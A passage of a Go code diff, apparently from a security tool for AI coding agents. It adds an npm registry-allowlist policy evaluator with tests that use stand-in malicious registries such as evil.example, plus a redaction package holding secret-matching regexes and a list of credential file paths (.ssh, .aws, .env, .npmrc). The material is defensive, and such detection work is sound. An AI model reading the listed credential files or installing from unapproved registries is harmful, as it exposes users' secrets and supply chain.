{ + switch binary { + case "npm", "npx", "pnpm", "pnpx", "yarn", "bun", "bunx": + return EcosystemNPM + } + return "" +} + +// KnownEcosystems lists the ecosystems the runtime recognizes. +func KnownEcosystems() []Ecosystem { + return []Ecosystem{EcosystemNPM} +} + +// IsKnown reports whether e is one of the ecosystems the runtime +// recognizes. +func IsKnown(e Ecosystem) bool { + for _, k := range KnownEcosystems() { + if k == e { + return true + } + } + return false +} diff --git a/internal/aiagents/policy/eval.go b/internal/aiagents/policy/eval.go new file mode 100644 index 0000000..b0cfe78 --- /dev/null +++ b/internal/aiagents/policy/eval.go @@ -0,0 +1,200 @@ +package policy + +import ( + "strings" +) + +// Request is what the runtime hands to Eval after parsing a hook payload. +// All fields are optional except Ecosystem + CommandKind; missing data +// tends toward Allow (fail-open). +type Request struct { + Ecosystem Ecosystem // resolved by EcosystemFor(parsed.Binary) + PackageManager string // raw binary observed: "npm" | "pnpm" | "yarn" | "bun" | "npx" | ... + CommandKind string // "install" | "config_set" | "config_delete" | "config_edit" | "exec" | ... + Registry string // resolved per cwd, e.g. "https://registry.npmjs.org/" + RegistryFlag string // value of --registry= if present on argv + UserconfigFlag string // value of --userconfig= if present on argv + InlineEnv map[string]string // KEY=VAL prefix env vars on argv + ConfigKeyMutated string // for config_set/config_delete: which key + ConfigValue string // for config_set: the new value +} + +// Eval is a pure function over Policy + Request. The runtime persists the +// returned Decision both on the JSONL event and (via the adapter) on the +// stdout response. +func Eval(p Policy, req Request) Decision { + block, ok := p.Ecosystems[req.Ecosystem] + if !ok || !block.Enabled { + return AllowDecision(CodePolicyDisabled, "policy disabled for ecosystem "+string(req.Ecosystem)) + } + return evalForEcosystem(block, req) +} + +func evalForEcosystem(block EcosystemPolicy, req Request) Decision { + switch req.CommandKind { + case "install", "publish": + return evalInstall(block, req) + case "config_set": + return evalConfigSet(block, req) + case "config_delete": + if isManagedKey(req.Ecosystem, req.PackageManager, req.ConfigKeyMutated) { + return BlockDecision(CodeManagedKeyMutation, + "config delete on managed key "+req.ConfigKeyMutated) + } + return AllowDecision(CodeAllowed, "non-managed config delete") + case "config_edit": + return BlockDecision(CodeManagedKeyEdit, + "interactive config edit could mutate managed keys") + default: + return AllowDecision(CodeNotInstallCommand, + "command kind "+req.CommandKind+" not policy-relevant") + } +} + +func evalInstall(block EcosystemPolicy, req Request) Decision { + if req.UserconfigFlag != "" { + return BlockDecision(CodeUserconfigFlag, + "--userconfig points at "+req.UserconfigFlag) + } + // Precedence: a CLI flag wins, then inline env, then system config. + // We only check the level the package manager will actually use; the + // lower-precedence registries are moot for this invocation. + if req.RegistryFlag != "" { + if !registryAllowed(block.Registry.Allowlist, req.RegistryFlag) { + return BlockDecision(CodeRegistryFlag, + "--registry="+req.RegistryFlag+" not in allowlist") + } + return AllowDecision(CodeAllowed, "registry flag allowlisted") + } + if envReg := envRegistryOverride(req.Ecosystem, req.InlineEnv); envReg != "" { + if !registryAllowed(block.Registry.Allowlist, envReg) { + return BlockDecision(CodeRegistryEnv, + "inline env registry "+envReg+" not in allowlist") + } + return AllowDecision(CodeAllowed, "env registry allowlisted") + } + if req.Registry == "" { + // Cannot resolve; fail-open with an audit-able code. + return AllowDecision(CodeInsufficientData, "no registry resolved") + } + if !registryAllowed(block.Registry.Allowlist, req.Registry) { + return BlockDecision(CodeRegistryNotAllowed, + "registry "+req.Registry+" not in allowlist") + } + return AllowDecision(CodeAllowed, "registry allowlisted") +} + +func evalConfigSet(block EcosystemPolicy, req Request) Decision { + if !isManagedKey(req.Ecosystem, req.PackageManager, req.ConfigKeyMutated) { + return AllowDecision(CodeAllowed, "non-managed config key") + } + // Setting a managed registry key to an allowlisted value is fine. + if isRegistryKey(req.Ecosystem, req.PackageManager, req.ConfigKeyMutated) { + if registryAllowed(block.Registry.Allowlist, req.ConfigValue) { + return AllowDecision(CodeAllowed, "managed registry set to allowlisted value") + } + return BlockDecision(CodeRegistryNotAllowed, + "config set "+req.ConfigKeyMutated+"="+req.ConfigValue+" not allowlisted") + } + // Cooldown / other managed keys: block unconditional mutation; the + // authoritative value is owned by the runtime. + return BlockDecision(CodeManagedKeyMutation, + "config set on managed key "+req.ConfigKeyMutated) +} + +// registryAllowed normalizes both sides (trailing slash) and prefix-matches. +func registryAllowed(allowlist []string, candidate string) bool { + c := normalizeRegistry(candidate) + if c == "" { + return false + } + for _, a := range allowlist { + n := normalizeRegistry(a) + if n == "" { + continue + } + if strings.HasPrefix(c, n) { + return true + } + } + return false +} + +func normalizeRegistry(s string) string { + s = strings.TrimSpace(s) + if s == "" { + return "" + } + // Lowercase scheme + host comparisons are too lossy for path-bearing + // registry URLs; we instead normalize trailing slash only. Callers + // supply real URLs (no quoting). + if !strings.HasSuffix(s, "/") { + s += "/" + } + return s +} + +// managedKeysFor returns the per-PM managed-key table for an ecosystem. +// New ecosystems add a case; non-config-set ecosystems can return nil. +func managedKeysFor(eco Ecosystem) map[string]map[string]struct{} { + switch eco { + case EcosystemNPM: + return map[string]map[string]struct{}{ + "npm": {"registry": {}, "min-release-age": {}, "ignore-scripts": {}}, + "pnpm": {"registry": {}, "minimum-release-age": {}, "min-release-age": {}, "ignoreScripts": {}, "ignore-scripts": {}}, + "yarn": {"npmRegistryServer": {}, "npmMinimalAgeGate": {}, "enableScripts": {}}, + "bun": {"registry": {}, "minimumReleaseAge": {}, "ignoreScripts": {}}, + } + } + return nil +} + +func isManagedKey(eco Ecosystem, pm, key string) bool { + if key == "" { + return false + } + table := managedKeysFor(eco) + if table == nil { + return false + } + if m, ok := table[pm]; ok { + _, ok := m[key] + return ok + } + return false +} + +func isRegistryKey(eco Ecosystem, pm, key string) bool { + switch eco { + case EcosystemNPM: + if pm == "yarn" { + return key == "npmRegistryServer" + } + return key == "registry" + } + return false +} + +// envRegistryOverride returns the registry URL set by an inline +// `KEY=VAL ` prefix, or "" if none of the recognized keys are set. +func envRegistryOverride(eco Ecosystem, env map[string]string) string { + if len(env) == 0 { + return "" + } + var keys []string + switch eco { + case EcosystemNPM: + keys = []string{ + "NPM_CONFIG_REGISTRY", + "PNPM_CONFIG_REGISTRY", + "YARN_NPM_REGISTRY_SERVER", + "BUN_CONFIG_REGISTRY", + } + } + for _, k := range keys { + if v, ok := env[k]; ok && v != "" { + return v + } + } + return "" +} diff --git a/internal/aiagents/policy/eval_test.go b/internal/aiagents/policy/eval_test.go new file mode 100644 index 0000000..e03fe5e --- /dev/null +++ b/internal/aiagents/policy/eval_test.go @@ -0,0 +1,237 @@ +package policy + +import "testing" + +func basePolicy() Policy { + return Policy{ + Version: 1, + Ecosystems: map[Ecosystem]EcosystemPolicy{ + EcosystemNPM: { + Enabled: true, + Registry: RegistryPolicy{Allowlist: []string{"https://registry.npmjs.org/"}}, + }, + }, + } +} + +func TestEvalDisabledPolicyAllows(t *testing.T) { + p := basePolicy() + npm := p.Ecosystems[EcosystemNPM] + npm.Enabled = false + p.Ecosystems[EcosystemNPM] = npm + got := Eval(p, Request{Ecosystem: EcosystemNPM, PackageManager: "npm", CommandKind: "install", Registry: "https://evil.example/"}) + if !got.Allow { + t.Errorf("expected allow when policy disabled") + } + if got.Code != CodePolicyDisabled { + t.Errorf("code: %s", got.Code) + } +} + +func TestEvalUnknownEcosystemAllows(t *testing.T) { + got := Eval(basePolicy(), Request{Ecosystem: Ecosystem("pypi"), PackageManager: "pip", CommandKind: "install"}) + if !got.Allow { + t.Errorf("expected allow for ecosystem with no policy block") + } + if got.Code != CodePolicyDisabled { + t.Errorf("code: %s", got.Code) + } +} + +func TestEvalAllowsAllowlistedRegistry(t *testing.T) { + got := Eval(basePolicy(), Request{ + Ecosystem: EcosystemNPM, + PackageManager: "npm", + CommandKind: "install", + Registry: "https://registry.npmjs.org/", + }) + if !got.Allow { + t.Errorf("expected allow, got: %+v", got) + } +} + +func TestEvalNormalizesTrailingSlash(t *testing.T) { + got := Eval(basePolicy(), Request{ + Ecosystem: EcosystemNPM, + PackageManager: "npm", + CommandKind: "install", + Registry: "https://registry.npmjs.org", + }) + if !got.Allow { + t.Errorf("expected allow on trailing-slash mismatch, got: %+v", got) + } +} + +func TestEvalBlocksUnallowlistedRegistry(t *testing.T) { + got := Eval(basePolicy(), Request{ + Ecosystem: EcosystemNPM, + PackageManager: "npm", + CommandKind: "install", + Registry: "https://evil.example/", + }) + if got.Allow { + t.Errorf("expected block") + } + if got.Code != CodeRegistryNotAllowed { + t.Errorf("code: %s", got.Code) + } + if got.UserMessage != GenericBlockMessage { + t.Errorf("user message leaked detail: %q", got.UserMessage) + } + if got.InternalDetail == "" { + t.Error("expected internal detail for audit") + } +} + +func TestEvalAllowlistedFlagWinsOverNonallowlistedEffective(t *testing.T) { + got := Eval(basePolicy(), Request{ + Ecosystem: EcosystemNPM, + PackageManager: "npm", + CommandKind: "install", + Registry: "https://stale.example/", + RegistryFlag: "https://registry.npmjs.org/", + }) + if !got.Allow { + t.Errorf("expected allow when flag is allowlisted, got: %+v", got) + } +} + +func TestEvalBlocksRegistryFlagOverride(t *testing.T) { + got := Eval(basePolicy(), Request{ + Ecosystem: EcosystemNPM, + PackageManager: "npm", + CommandKind: "install", + Registry: "https://registry.npmjs.org/", + RegistryFlag: "https://evil.example/", + }) + if got.Allow || got.Code != CodeRegistryFlag { + t.Errorf("expected registry_flag block, got: %+v", got) + } +} + +func TestEvalBlocksUserconfigOverride(t *testing.T) { + got := Eval(basePolicy(), Request{ + Ecosystem: EcosystemNPM, + PackageManager: "npm", + CommandKind: "install", + Registry: "https://registry.npmjs.org/", + UserconfigFlag: "/tmp/evil.npmrc", + }) + if got.Allow || got.Code != CodeUserconfigFlag { + t.Errorf("expected userconfig block, got: %+v", got) + } +} + +func TestEvalBlocksEnvRegistryOverride(t *testing.T) { + got := Eval(basePolicy(), Request{ + Ecosystem: EcosystemNPM, + PackageManager: "npm", + CommandKind: "install", + Registry: "https://registry.npmjs.org/", + InlineEnv: map[string]string{"NPM_CONFIG_REGISTRY": "https://evil.example/"}, + }) + if got.Allow || got.Code != CodeRegistryEnv { + t.Errorf("expected env block, got: %+v", got) + } +} + +func TestEvalBlocksConfigSetOnManagedRegistry(t *testing.T) { + got := Eval(basePolicy(), Request{ + Ecosystem: EcosystemNPM, + PackageManager: "npm", + CommandKind: "config_set", + ConfigKeyMutated: "registry", + ConfigValue: "https://evil.example/", + }) + if got.Allow || got.Code != CodeRegistryNotAllowed { + t.Errorf("expected block on config set registry to non-allowlisted, got: %+v", got) + } +} + +func TestEvalAllowsConfigSetOnUnmanagedKey(t *testing.T) { + got := Eval(basePolicy(), Request{ + Ecosystem: EcosystemNPM, + PackageManager: "npm", + CommandKind: "config_set", + ConfigKeyMutated: "color", + ConfigValue: "true", + }) + if !got.Allow { + t.Errorf("expected allow on unmanaged key, got: %+v", got) + } +} + +func TestEvalBlocksConfigDeleteOnManagedKey(t *testing.T) { + got := Eval(basePolicy(), Request{ + Ecosystem: EcosystemNPM, + PackageManager: "npm", + CommandKind: "config_delete", + ConfigKeyMutated: "registry", + }) + if got.Allow || got.Code != CodeManagedKeyMutation { + t.Errorf("expected block, got: %+v", got) + } +} + +func TestEvalBlocksConfigEdit(t *testing.T) { + got := Eval(basePolicy(), Request{ + Ecosystem: EcosystemNPM, + PackageManager: "npm", + CommandKind: "config_edit", + }) + if got.Allow || got.Code != CodeManagedKeyEdit { + t.Errorf("expected config_edit block, got: %+v", got) + } +} + +func TestEvalAllowsInsufficientData(t *testing.T) { + got := Eval(basePolicy(), Request{ + Ecosystem: EcosystemNPM, + PackageManager: "pnpm", + CommandKind: "install", + }) + if !got.Allow { + t.Errorf("expected allow on missing registry data") + } + if got.Code != CodeInsufficientData { + t.Errorf("code: %s", got.Code) + } +} + +func TestEvalBlocksConfigSetOnManagedCooldownKey(t *testing.T) { + got := Eval(basePolicy(), Request{ + Ecosystem: EcosystemNPM, + PackageManager: "npm", + CommandKind: "config_set", + ConfigKeyMutated: "min-release-age", + ConfigValue: "0", + }) + if got.Allow || got.Code != CodeManagedKeyMutation { + t.Errorf("expected block on cooldown key mutation, got: %+v", got) + } +} + +func TestEvalAllowlistPrefixMatch(t *testing.T) { + p := basePolicy() + npm := p.Ecosystems[EcosystemNPM] + npm.Registry.Allowlist = []string{"https://proxy.example/orgs/acme/"} + p.Ecosystems[EcosystemNPM] = npm + got := Eval(p, Request{ + Ecosystem: EcosystemNPM, + PackageManager: "npm", + CommandKind: "install", + Registry: "https://proxy.example/orgs/acme/repo-a/", + }) + if !got.Allow { + t.Errorf("expected prefix-match allow, got: %+v", got) + } + got = Eval(p, Request{ + Ecosystem: EcosystemNPM, + PackageManager: "npm", + CommandKind: "install", + Registry: "https://proxy.example/orgs/other/", + }) + if got.Allow { + t.Errorf("expected prefix-match block") + } +} diff --git a/internal/aiagents/policy/policy.go b/internal/aiagents/policy/policy.go new file mode 100644 index 0000000..a69ac2c --- /dev/null +++ b/internal/aiagents/policy/policy.go @@ -0,0 +1,81 @@ +// Package policy holds the policy data model and pure decision +// evaluator. The package is agent-agnostic: adapters consume only the +// resulting Decision; the package never imports adapter code. +// +// The active policy is the embedded default at policy/builtin/policy.json. +// A future revision will replace Builtin() with a fetch from the +// StepSecurity backend; call sites consume Policy values and need not +// change. There is intentionally no on-disk override. +package policy + +import ( + _ "embed" + "encoding/json" + "fmt" +) + +// Mode controls what the runtime does with a policy violation. +// +// - ModeAudit: evaluate, persist a finding describing what *would* have +// blocked, but always emit an allow response to the agent. +// - ModeBlock: evaluate, persist the finding, and on an explicit +// violation flip the response to block. +// +// Mode is policy-wide; there is no per-ecosystem override. Endpoint-level +// behavior is the call the org wants to make uniformly across ecosystems. +type Mode string + +const ( + ModeAudit Mode = "audit" + ModeBlock Mode = "block" +) + +// Policy is the active policy document. Per-ecosystem enforcement lives +// under Ecosystems; a missing or disabled block means the runtime allows +// that ecosystem unconditionally and emits no policy_decision. +type Policy struct { + Version int `json:"version"` + Mode Mode `json:"mode,omitempty"` + Ecosystems map[Ecosystem]EcosystemPolicy `json:"ecosystems"` +} + +// ResolveMode returns p.Mode if it is a known value; otherwise ModeAudit. +// Unknown or empty strings collapse to audit so a malformed policy can +// never silently switch the endpoint into block mode. +func ResolveMode(p Policy) Mode { + switch p.Mode { + case ModeBlock: + return ModeBlock + default: + return ModeAudit + } +} + +// EcosystemPolicy carries the per-ecosystem enforcement settings. Today +// every ecosystem is registry-pin only; future fields land here without +// changing the surrounding shape. +type EcosystemPolicy struct { + Enabled bool `json:"enabled"` + Registry RegistryPolicy `json:"registry"` +} + +// RegistryPolicy expresses the secure-registry pinning policy. +type RegistryPolicy struct { + // Allowlist is the set of permitted registry URLs. Matching is + // prefix-based after trailing-slash normalization. + Allowlist []string `json:"allowlist"` +} + +//go:embed builtin/policy.json +var builtinPolicyJSON []byte + +// Builtin returns the embedded policy. The embedded JSON is checked at +// build time by the test suite; a parse failure here is a programmer +// error, not a runtime condition. +func Builtin() Policy { + var p Policy + if err := json.Unmarshal(builtinPolicyJSON, &p); err != nil { + panic(fmt.Errorf("policy: builtin parse: %w", err)) + } + return p +} diff --git a/internal/aiagents/policy/policy_test.go b/internal/aiagents/policy/policy_test.go new file mode 100644 index 0000000..787a4df --- /dev/null +++ b/internal/aiagents/policy/policy_test.go @@ -0,0 +1,50 @@ +package policy + +import "testing" + +func TestBuiltinParses(t *testing.T) { + p := Builtin() + if p.Version == 0 { + t.Errorf("builtin policy: version 0") + } + npm, ok := p.Ecosystems[EcosystemNPM] + if !ok { + t.Fatalf("builtin policy: missing npm block") + } + if !npm.Enabled { + t.Errorf("builtin policy: npm block must ship enabled") + } + if len(npm.Registry.Allowlist) == 0 { + t.Errorf("builtin policy: expected allowlist") + } +} + +func TestBuiltinDefaultsToAuditMode(t *testing.T) { + p := Builtin() + if got := ResolveMode(p); got != ModeAudit { + t.Errorf("builtin policy: expected audit mode, got %q", got) + } +} + +func TestResolveModeFallsBackToAudit(t *testing.T) { + cases := []struct { + name string + in Mode + }{ + {"empty", ""}, + {"unknown", "garbage"}, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + if got := ResolveMode(Policy{Mode: tc.in}); got != ModeAudit { + t.Errorf("ResolveMode(%q) = %q, want %q", tc.in, got, ModeAudit) + } + }) + } +} + +func TestResolveModeHonorsBlock(t *testing.T) { + if got := ResolveMode(Policy{Mode: ModeBlock}); got != ModeBlock { + t.Errorf("ResolveMode(block) = %q, want %q", got, ModeBlock) + } +} diff --git a/internal/aiagents/redact/redact.go b/internal/aiagents/redact/redact.go new file mode 100644 index 0000000..50aec7b --- /dev/null +++ b/internal/aiagents/redact/redact.go @@ -0,0 +1,237 @@ +// Package redact removes likely secrets from strings and JSON-shaped values +// before they are written to disk or sent over the wire. Redaction MUST +// run before every write, including error logs. +package redact + +import ( + "regexp" + "strings" +) + +// Placeholder is what every matched secret is replaced with. +const Placeholder = "[REDACTED]" + +// rule pairs a compiled regex with the submatch group whose content should be +// replaced. group == 0 redacts the entire match. +type rule struct { + name string + re *regexp.Regexp + group int +} + +// rules is intentionally conservative. Adding too aggressive a rule risks +// turning normal logs into a wall of [REDACTED] and hiding genuine signal. +// Every rule here exists to satisfy the redaction regression tests. +var rules = []rule{ + // PEM-encoded private keys: redact the whole block. The optional + // ` BLOCK` suffix covers PGP armor (`BEGIN PGP PRIVATE KEY BLOCK`) + // alongside RSA / OPENSSH / PKCS#8 ("BEGIN PRIVATE KEY") variants. + { + name: "private_key_block", + re: regexp.MustCompile(`(?s)-----BEGIN[ A-Z]*PRIVATE KEY( BLOCK)?-----.*?-----END[ A-Z]*PRIVATE KEY( BLOCK)?-----`), + }, + // AWS access key IDs: stable prefix + 16 base32-ish chars. + { + name: "aws_access_key_id", + re: regexp.MustCompile(`\b(?:AKIA|ASIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ABIA|ACCA)[0-9A-Z]{16}\b`), + }, + // GitHub classic tokens (PAT, OAuth, server-to-server, refresh). + // The header-style rule below covers `github_pat_*` fine-grained + // tokens, which use a different prefix shape. + { + name: "github_token", + re: regexp.MustCompile(`\bgh[pousr]_[A-Za-z0-9]{16,}\b`), + }, + // GitHub fine-grained PAT: `github_pat_<22>_<59>` per GitHub docs. + // The inner `_` between the two segments is matched by the + // underscore in the character class. + { + name: "github_fine_grained_pat", + re: regexp.MustCompile(`\bgithub_pat_[A-Za-z0-9_]{20,}\b`), + }, + // Slack tokens. + { + name: "slack_token", + re: regexp.MustCompile(`\bxox[abprs]-[A-Za-z0-9-]{10,}\b`), + }, + // Authorization: Bearer . + { + name: "bearer_token", + re: regexp.MustCompile(`(?i)(authorization\s*[:=]\s*"?\s*bearer\s+)([A-Za-z0-9._\-+/=]{8,})`), + group: 2, + }, + // Standalone "Bearer " outside of an Authorization header. + { + name: "bearer_inline", + re: regexp.MustCompile(`(?i)\b(bearer\s+)([A-Za-z0-9._\-+/=]{16,})`), + group: 2, + }, + // npm auth tokens in .npmrc style. + { + name: "npm_auth_token", + re: regexp.MustCompile(`(?i)(_authToken\s*=\s*)([^\s"]+)`), + group: 2, + }, + { + name: "npm_auth", + re: regexp.MustCompile(`(?i)(\b_auth\s*=\s*)([^\s"]+)`), + group: 2, + }, + // AWS secret access key style assignments. + { + name: "aws_secret_access_key", + re: regexp.MustCompile(`(?i)(aws_secret_access_key\s*[:=]\s*"?)([A-Za-z0-9/+=]{30,})`), + group: 2, + }, + // Generic KEY=value assignments for common secret-bearing names. + { + name: "secret_assignment", + re: regexp.MustCompile(`(?i)\b([A-Z0-9_]*(?:PASSWORD|PASSWD|SECRET|TOKEN|API[_-]?KEY|ACCESS[_-]?KEY|PRIVATE[_-]?KEY))\s*[:=]\s*("?)([^\s"'#]+)`), + group: 3, + }, + // JSON-shaped key/value pairs, e.g. "api_key": "abc". + { + name: "secret_json_field", + re: regexp.MustCompile(`(?i)("(?:password|passwd|secret|token|api[_-]?key|access[_-]?key|private[_-]?key|authorization)"\s*:\s*")([^"]+)`), + group: 2, + }, + // URL userinfo: https://user:pass@host/... — redact the userinfo + // segment (everything between scheme:// and @). Matches any scheme. + { + name: "url_userinfo", + re: regexp.MustCompile(`(?i)\b([a-z][a-z0-9+.\-]*://)([^\s/@]+)@`), + group: 2, + }, + // URL query-string credentials. Param name is matched with an + // optional `_` so suffix variants (access_token, + // refresh_token, id_token, client_secret, jwt_signature, ...) are + // covered. OAuth `code` and `state` are short-lived but + // credential-grade during their window. + { + name: "url_query_secret", + re: regexp.MustCompile(`(?i)([?&](?:[a-z0-9_-]*_)?(?:token|secret|signature|password|passwd|api[_-]?key|apikey|auth|sig|code|state)=)([^&\s#]+)`), + group: 2, + }, +} + +// Sensitive path patterns. Callers consult these to decide whether a +// payload references credential material. +var sensitivePathREs = []*regexp.Regexp{ + regexp.MustCompile(`(^|/)\.env(\.|$)`), + regexp.MustCompile(`(^|/)\.env$`), + regexp.MustCompile(`(^|/)secrets/`), + regexp.MustCompile(`\.pem$`), + regexp.MustCompile(`\.key$`), + regexp.MustCompile(`\.p12$`), + regexp.MustCompile(`(^|/)\.ssh/`), + regexp.MustCompile(`(^|/)\.aws/`), + regexp.MustCompile(`(^|/)\.npmrc$`), + regexp.MustCompile(`(^|/)\.pypirc$`), +} + +// String redacts secrets in s. +func String(s string) string { + if s == "" { + return s + } + out := s + for _, r := range rules { + out = applyRule(out, r) + } + return out +} + +func applyRule(s string, r rule) string { + if !r.re.MatchString(s) { + return s + } + if r.group == 0 { + return r.re.ReplaceAllString(s, Placeholder) + } + return r.re.ReplaceAllStringFunc(s, func(match string) string { + idx := r.re.FindStringSubmatchIndex(match) + if idx == nil || len(idx) < 2*(r.group+1) { + return Placeholder + } + start := idx[2*r.group] - idx[0] + end := idx[2*r.group+1] - idx[0] + if start < 0 || end < 0 || start > end || end > len(match) { + return Placeholder + } + return match[:start] + Placeholder + match[end:] + }) +} + +// Bytes is a convenience wrapper around String for []byte data. +func Bytes(b []byte) []byte { + if len(b) == 0 { + return b + } + return []byte(String(string(b))) +} + +// Value walks an arbitrary JSON-decoded value (map[string]any, []any, string, +// numbers, etc.) and redacts any string leaves. Map keys whose lowercased +// names look secret-bearing are redacted entirely. +func Value(v any) any { + switch t := v.(type) { + case nil: + return nil + case string: + return String(t) + case map[string]any: + out := make(map[string]any, len(t)) + for k, val := range t { + if isSecretKey(k) { + if _, ok := val.(string); ok { + out[k] = Placeholder + continue + } + out[k] = Placeholder + continue + } + out[k] = Value(val) + } + return out + case []any: + out := make([]any, len(t)) + for i, val := range t { + out[i] = Value(val) + } + return out + default: + return v + } +} + +func isSecretKey(k string) bool { + lk := strings.ToLower(k) + switch lk { + case "password", "passwd", "secret", "token", "api_key", "apikey", + "access_key", "accesskey", "private_key", "privatekey", + "authorization", "_authtoken", "_auth", "api-key": + return true + } + return strings.Contains(lk, "password") || + strings.Contains(lk, "secret") || + strings.Contains(lk, "token") || + strings.Contains(lk, "api_key") || + strings.Contains(lk, "apikey") || + strings.Contains(lk, "private_key") || + strings.Contains(lk, "authorization") +} + +// IsSensitivePath reports whether p matches any of the credential-bearing +// path patterns. +func IsSensitivePath(p string) bool { + if p == "" { + return false + } + norm := strings.ReplaceAll(p, "\\", "/") + for _, re := range sensitivePathREs { + if re.MatchString(norm) { + return true + } + } + return false +} diff --git a/internal/aiagents/redact/redact_test.go b/internal/aiagents/redact/redact_test.go new file mode 100644 index 0000000..6f6c9a3 --- /dev/null +++ b/internal/aiagents/redact/redact_test.go @@ -0,0 +1,418 @@ +package redact + +import ( + "strings" + "testing" +) + +func TestStringRedactsCommonSecrets(t *testing.T) { + cases := []struct { + name string + in string + // substrings that must NOT appear in the redacted output. + mustNotContain []string + }{ + { + name: "stepsecurity api key", + in: `STEPSECURITY_API_KEY=ss_live_AbCdEfGhIjKlMnOp`, + mustNotContain: []string{"ss_live_AbCdEfGhIjKlMnOp"}, + }, + { + name: "npm authToken", + in: "//registry.npmjs.org/:_authToken=npm_xyzabc1234567890", + mustNotContain: []string{"npm_xyzabc1234567890"}, + }, + { + name: "npm _auth", + in: "_auth=dXNlcjpwYXNzd29yZA==", + mustNotContain: []string{"dXNlcjpwYXNzd29yZA=="}, + }, + { + name: "bearer header", + in: "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.payload.sig", + mustNotContain: []string{"eyJhbGciOiJIUzI1NiJ9.payload.sig"}, + }, + { + name: "aws access key", + in: "key AKIAIOSFODNN7EXAMPLE here", + mustNotContain: []string{"AKIAIOSFODNN7EXAMPLE"}, + }, + { + name: "aws secret key", + in: `AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"`, + mustNotContain: []string{"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"}, + }, + { + name: "password assignment", + in: "DB_PASSWORD=hunter2", + mustNotContain: []string{"hunter2"}, + }, + { + name: "token assignment", + in: "GITHUB_TOKEN=ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", + mustNotContain: []string{"ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}, + }, + { + name: "secret assignment", + in: "JWT_SECRET=topsecretvalue", + mustNotContain: []string{"topsecretvalue"}, + }, + { + name: "api key assignment", + in: "OPENAI_API_KEY=sk-proj-1234567890abcdef", + mustNotContain: []string{"sk-proj-1234567890abcdef"}, + }, + { + name: "bare password assignment", + in: "PASSWORD=hunter2", + mustNotContain: []string{"hunter2"}, + }, + { + name: "bare token assignment", + in: "TOKEN=abc123def456", + mustNotContain: []string{"abc123def456"}, + }, + { + name: "bare api key assignment", + in: "API_KEY=sk-proj-bare123456", + mustNotContain: []string{"sk-proj-bare123456"}, + }, + { + name: "private key block", + in: "-----BEGIN RSA PRIVATE KEY-----\n" + + "MIIBOgIBAAJBAKj\n" + + "-----END RSA PRIVATE KEY-----", + mustNotContain: []string{"MIIBOgIBAAJBAKj"}, + }, + { + name: "url userinfo", + in: "fetched https://alice:s3cret@api.example.com:8443/users", + mustNotContain: []string{"alice:s3cret", "s3cret"}, + }, + { + name: "url query token", + in: "redirect to https://example.com/cb?token=abc123def456 then proceed", + mustNotContain: []string{"abc123def456"}, + }, + { + name: "url query access_token", + in: "https://api.example.com/me?access_token=zzzzz&user=alice", + mustNotContain: []string{"zzzzz"}, + }, + { + name: "url query refresh_token", + in: "https://api.example.com/cb?refresh_token=rrrrr", + mustNotContain: []string{"rrrrr"}, + }, + { + name: "url query id_token", + in: "https://idp.example.com/cb?id_token=jjjjj", + mustNotContain: []string{"jjjjj"}, + }, + { + name: "url query client_secret", + in: "https://idp.example.com/token?client_id=app&client_secret=ssssss", + mustNotContain: []string{"ssssss"}, + }, + { + name: "url query oauth code", + in: "https://app.example.com/cb?code=AUTHCODEABC&state=xyz", + mustNotContain: []string{"AUTHCODEABC"}, + }, + { + name: "url query oauth state", + in: "https://app.example.com/cb?state=opaqueSESSION123", + mustNotContain: []string{"opaqueSESSION123"}, + }, + } + + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + out := String(tc.in) + if !strings.Contains(out, Placeholder) { + t.Fatalf("expected redaction placeholder in output; got %q", out) + } + for _, banned := range tc.mustNotContain { + if strings.Contains(out, banned) { + t.Fatalf("redacted output still contains %q: %q", banned, out) + } + } + }) + } +} + +func TestStringPreservesNonSecrets(t *testing.T) { + cases := []string{ + "user ran: npm install lodash", + // URL with no userinfo or credential query params must pass through. + "https://api.example.com:8443/v1/users?user=alice&limit=10", + // Param names that merely *contain* a keyword fragment but do not + // end on it must NOT be redacted (e.g. statefulservice contains + // "state", client_id is public). + "https://api.example.com/v1?statefulservice=true", + "https://idp.example.com/authorize?client_id=public_app_id", + } + for _, in := range cases { + if got := String(in); got != in { + t.Errorf("expected unchanged, got %q", got) + } + } +} + +// URL userinfo redaction must keep the host portion intact so the +// audit log still shows where traffic went. +func TestStringRedactsURLUserinfoKeepsHost(t *testing.T) { + got := String("https://user:secret@mcp.example.com:8443/path") + if !strings.Contains(got, "mcp.example.com:8443") { + t.Errorf("host stripped: %q", got) + } + if strings.Contains(got, "secret") || strings.Contains(got, "user:") { + t.Errorf("userinfo leaked: %q", got) + } +} + +func TestValueRedactsNestedSecrets(t *testing.T) { + in := map[string]any{ + "command": "git push", + "env": map[string]any{ + "GITHUB_TOKEN": "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", + "USER": "alice", + }, + "headers": []any{ + "Authorization: Bearer eyJ.payload.sig", + }, + } + out := Value(in).(map[string]any) + env := out["env"].(map[string]any) + if env["GITHUB_TOKEN"] != Placeholder { + t.Fatalf("expected GITHUB_TOKEN redacted by key, got %v", env["GITHUB_TOKEN"]) + } + if env["USER"] != "alice" { + t.Fatalf("expected USER preserved, got %v", env["USER"]) + } + hdr := out["headers"].([]any)[0].(string) + if strings.Contains(hdr, "eyJ.payload.sig") { + t.Fatalf("bearer not redacted in nested array: %q", hdr) + } +} + +func TestStringIsIdempotent(t *testing.T) { + // Running redaction twice must produce the same output as running it + // once. Re-running is the simplest way for a caller (e.g., the error + // logger) to be sure a previously-redacted string isn't double-mangled. + inputs := []string{ + "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.payload.sig", + "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY", + "https://alice:s3cret@api.example.com/users", + "plain log line with no secrets", + "", + } + for _, in := range inputs { + once := String(in) + twice := String(once) + if once != twice { + t.Errorf("not idempotent for %q:\n once = %q\n twice = %q", in, once, twice) + } + } +} + +func TestStringRedactsMultipleSecretsInOneInput(t *testing.T) { + in := "AKIAIOSFODNN7EXAMPLE then 